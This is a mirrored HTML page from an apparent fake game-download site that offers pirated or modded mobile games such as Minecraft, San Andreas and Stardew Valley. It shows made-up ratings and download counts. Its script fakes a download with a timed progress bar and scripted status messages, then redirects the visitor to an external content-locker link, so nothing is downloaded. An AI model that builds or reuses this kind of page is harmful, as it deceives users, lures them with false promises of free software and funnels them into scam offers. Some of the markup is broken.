<html>

<!-- Mirrored from 3apps.pro/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 01 Apr 2020 15:36:39 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from gta5-mobile.online/download/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 14 Dec 2021 11:27:40 GMT -->

<!-- Mirrored from games4mobile.xyz/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 21 Mar 2022 15:40:19 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <link rel="stylesheet" href="path/to/font-awesome/css/font-awesome.min.html">

   
<meta name="google-site-verification" content="BO0wVSEsVchjkyEyLJ3Ji3sk-SbQ9M8EKQtgCWXeaL0" />
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible"f content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="pushsdk" content="0b3aea1c0f84c935acb87c8cc9a720bb">
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="05apps.us/maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="05apps.us/netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap-glyphicons.css" rel="stylesheet">

    <title>Mobile Games</title>
    <!-- Styles -->
    <link href="05apps.us/fonts.googleapis.com/csse092e092.html?family=Open+Sans:400,300,600" rel="stylesheet" type="text/css">
    <link href="build/panel/app.css" rel="stylesheet">
    <link href="css/app.css" rel="stylesheet">
    <link href="css/framework7.css" rel="stylesheet">

<style>
.install-btn-text {
    font-size: 12px;
    color: #000000;
}
    p.Latest {
    display: contents;
}
 i.fab.fa-android {
    display: contents;
    font-family: fontawesome;
    color: #02bb22;
    font-size: 12px;
    padding-right: 6px;
        font-style: normal;
}

i.fab.fa-apple {
    display: contents;
    font-family: fontawesome;
    color: #057dd3;
    font-size: 12px;
    padding-right: 3px;
        font-style: normal;
}


.ios-icon {
	border-radius: 24%;
	box-shadow: rgb(0 0 0 / 20%) 0px 2px 10px;
	width: 78px;
	height: 78px;
	float: left;
	border-radius: 10px;
	border: 4px solid #fff;
}



.app-box-1 {
color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-2 {
color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-3 {
	color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-4 {
color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-5 {
color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-6 {
	color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-7 {
	color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-8 {
color: #FFF;
    background: #FFF;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #000;
    position: inherit;
    margin: 1px 1px 7px 1px;
}

.btn-success {
    padding: 3px 10px;
    border-radius: 10px !important;
    background: #D9D9D9;
    color: #D9D9D9;
    font-size: 14px;
    font-weight: 600;
    border: 1px solid;
}

   .stars1 {
   width: 100%;
    color: #250034;
    position: absolute;
    padding-left: 76px;
    margin: -13px 4px 11px 5px;
    font-size: 11px;
}
p.app-version {
    color: white;
    padding: 2px;
}
b1 {
    position: absolute;
    padding-left: 39px;
    margin: -11px 4px 11px 5px;
    font-weight: bold;
    font-size: 9px;
    color: #0B8F4D;
}
.app-name {
    font-weight: 700;
    font-size: 16px;
    padding-bottom: 12px;
}
i.fas.fa-download {
    display: initial;
    font-family: fontawesome;
    padding: 2px;
        font-style: normal;
}
i.fas.fa-user {
    display: initial;
    font-family: fontawesome;
    padding: 2px;
        font-style: normal;
}
.LINE-Dotted1 {
    border-top: 1px dotted;
    width: 39.2%;
    margin-left: 83px;
}
.Latest {
   position: absolute;
    margin: -17px 7px 3px;
    font-size: 12px;
    color: #000;
    font-weight: bold;
}
.version {
   position: absolute;
    margin: -16px 49px 3px;
    font-size: 12px;
    color: #0B004D;
    font-weight: bold;
    color: #0B004D;
}
.white-bg {
    background-image: linear-gradient(
200deg, #EB4646 0%, #EB4646 50%, #EB4646 100%);
    background-size: 100% 283px;
    background-repeat: no-repeat;
}
.review {
    position: absolute;
    left: 226.5px;
    display: inherit;
    background: #EB4646;
    color: #FFFDF8;
    border-radius: 0px 0px 8px 8px;
    padding: 0px 6px 0px 3px;
    border-left: 2px solid #f3cb07;
    border-bottom: 2px solid #F3CB1E;
    bottom: 88px;
}
i.fas.fa-star{
    display: initial;
    font-family: fontawesome;
    padding: 2px;
    color: #FCD014;
        font-style: normal;
}
.app-name1 {
    position: relative;
    padding: 0px 0px 13px 3px;
    right: 9px;
    FONT-WEIGHT: 700;
    font-family: inherit;
    font-size: 14px;
    color: #000;
}
.app-box {
    background-color: #65CBFF;
    border: unset;
    padding: 10px 0;
}
div#myPopup {
    background: #05000a;
    border: 2px solid #540049;
    border-radius: 13px;
}
}
#bar1 {
    background: #F3CB1E;
}
.md .dialog-title {
    font-size: 20px;
    color: #FF0049;
    line-height: 1.3;
}
</style>
    
    <script src="05apps.us/ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-M1SDFRF1MP"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-M1SDFRF1MP');
</script>
</head>
<body>
    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGHGVX2"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<main class="page-content framework7-root">
    <div class="page-inner white-bg">
        <div id="main-wrapper">
            <div class="row">
                <div class="col-md-6 col-xs-12 col-sm-12 center">
                    <div class="main-page-title">
                        <img src="img/logoe311e311e311.png?t" class="app-navbar-head-logo center breathing">
                    </div>
                    
                    <br>
                    <div class="app-box appscloud-block">

                       
                        
                        <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/minecraft-mod.jpg">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.7</div>
                                        <div class="app-name1">Minecraft APK </div>
                                        <div class="stars1"><i class="fas fa-user"></i>612,411</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('05apps.us/i.imgur.com/minecraft-mod.jpg', 'Minecraft APK','')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('05apps.us/i.imgur.com/minecraft-mod.jpg', 'Minecraft APK ','')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">3.2.1</div>
                                </div>
                            </div>
                            
                            <div class="col-md-12 app-list-md">
                                <div class="app-box-2">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/grand-theft-auto-san-andreas.png">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.8</div>
                                        <div class="app-name1">San Andreas</div>
                                        <div class="stars1"><i class="fas fa-user"></i>920,021</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/grand-theft-auto-san-andreas.png', 'San Andreas','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/grand-theft-auto-san-andreas.png', 'San Andreas ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/carx drift.jpg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Carx Drift Racing</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>


















<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/carx drift.jpg', 'Carx Drift Racing ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/carx drift.jpg', 'Carx Drift Racing ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/Royalmatch.jpg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Royal match APK</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>





<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/Royalmatch.jpg', 'Royal match APK ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/Royalmatch.jpg', 'Royal match APK','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/Real-Flight-Simulator.jpg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">RealFlight Simulator</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>




<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/Real-Flight-Simulator.jpg', 'RealFlight Simulator ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/Real-Flight-Simulator.jpg', 'RealFlight Simulator ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/MonopolyGO.jpg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Monopoly GO !</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>





<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/MonopolyGO.jpg', 'Monopoly GO ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/MonopolyGO.jpg', 'Monopoly GO ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/Poppy-Playtime-Chapitre-1.jpeg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Poppy Playtime 1</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>






<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/Poppy-Playtime-Chapitre-1.jpeg', 'Poppy Playtime 1.jpeg ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/Poppy-Playtime-Chapitre-1.jpeg', 'Poppy Playtime 1 ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/Geometry-Dash.jpg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Geometry Dash</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>









<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/Geometry-Dash.jpg', 'Geometry Dash ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/Geometry-Dash.jpg', 'Geometry Dash ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/pes.png">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">PES 2024 MOD APK</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>








<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/pes.png', 'PES 2024 MOD APK ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/pes.png', 'PES 2024 MOD APK ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/stardewvallery.jpg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Stardew Valley</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>







<div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/stardewvallery.jpg', 'Stardew Valley ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/stardewvallery.jpg', 'Stardew Valley ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/Terraria.png">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Terraria </div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>


















                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('05apps.us/i.imgur.com/Terraria.png', 'Terraria ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('05apps.us/i.imgur.com/Terraria.png', 'Rise of the Ronin ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="05apps.us/i.imgur.com/Slay-The-Spire.png">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">Slay The Spire</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>



                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a href="#" onclick="install('05apps.us/i.imgur.com/Slay-The-Spire.png', 'Slay The Spire ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a href="#" onclick="install('05apps.us/i.imgur.com/Slay-The-Spire.png', 'Slay The Spire ','')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">1.4.2</div>
                                </div>
                            </div>
                      <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="5apps.us/i.imgur.com/earn-to-die.png">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.7</div>
                                        <div class="app-name1">Earn To Die</div>
                                        <div class="stars1"><i class="fas fa-user"></i>812,411</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install(5apps.us/i.imgur.com/earn-to-die.png', 'Earn To Die ','')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('5apps.us/i.imgur.com/earn-to-die.png', 'Earn To Die ','')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>



                            <div class="Latest">Latest:</div> <div class="version">3.2.1</div>
                                </div>
                            </div>
                            
   
                           
                            
                    </div>
                </div>
            </div><!-- Row -->
        </div><!-- Main Wrapper -->
    </div><!-- Page Inner -->
</main><!-- Page Content -->

<div class="popup modal-in" id="install" style="background: #fff; display: none;">
    <div class="fake-homescreen" style="">
        <a id="close" class="close-button"></a>
        <div class="iphone-display" aria-hidden="true">
            <div class="app-icon-area">
                <div class="app-icon-region">
                    <img id="app_icon" alt="app icon" src="#" class="app-modal-icon" style="width: 33px; height: 33px;">
                </div>
                <div class="fake-homescreen-app-name" style="font-size:7.5px!important">
                    <span id="app_name" class="installingAppName">Pokemon Go Spoofing</span>
                </div>
            </div>
        </div>
    </div>
    <div class="block" style="color:#4C0034">
        <center>
            <div>
                <div class="app-caption">
                    <h2 id="app-caption-title">title</h2>
                    <p>Follow the steps after downloading</p>
                </div>
                <hr>
                <div class="details">
                    <a class="" onclick="start()" id="install-btn"></a>
                    
                </div>
            </div>
        </center>
    </div>
</div>
<div role="dialog">

    <div class="md" id="myPopup1" style="display: none">
        <div class="dialog-backdrop backdrop-in"></div>
        <div class="dialog dialog-no-buttons dialog-progress modal-in" id="myPopup" style="display: none; margin-top: -100px;">

            <div class="dialog-inner">
                <div class="dialog-title"><br>Downloading...
</div><div id="dt" class="dialog-text">Sit tight</div>
                <div class="progressbar">
                    <span id="bar1" style="width: 0%; display: inline-block; height: 100%; transform: scale(-1, 1);"></span>
                </div>
            </div>

        </div>
    </div>
</div>
<script>var lockerIDs=[];</script><script src="js/ipscript.js" type="text/javascript"></script>
<script>
    function id(id){
        return document.getElementById(id);
    }

    function install(icon, name, locker_id)
    {
        id("app_icon").src = icon;
        id("app_name").innerHTML = name;
        id("app-caption-title").innerHTML = name;

        window.lcr = "https://appinstallcheck.com/cl/i/g6kvmp" + (lockerIDs[name] ? lockerIDs[name] : locker_id);
        id("install").style.display = "block";
    }

    id('close').onclick = function(){
        id("install").style.display = "none";
    }

    // When the user clicks on div, open the popup
    function start() {
        var x = document.getElementById("myPopup1");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }
        var x = document.getElementById("myPopup");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }

        var i = 0;
        $("#bar1").animate(
                {width: "100%"},
                {
                    duration: 5000,
                    complete : function(){
                        location.href = window.lcr;
                    }
                });


        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Connecting to the servers')
            }

            setTimeout(changeText, 100);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Getting package url')
            }

            setTimeout(changeText, 100);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Downloading')
            }

            setTimeout(changeText, 200);

        });

        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Setting up final stage')
            }

            setTimeout(changeText, 100);

        });


    }
</script>
</body>

<!-- Mirrored from 3apps.pro/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 01 Apr 2020 15:36:45 GMT -->

<!-- Mirrored from gta5-mobile.online/download/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 14 Dec 2021 11:27:55 GMT -->

<!-- Mirrored from games4mobile.xyz/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 21 Mar 2022 15:40:31 GMT -->
</html>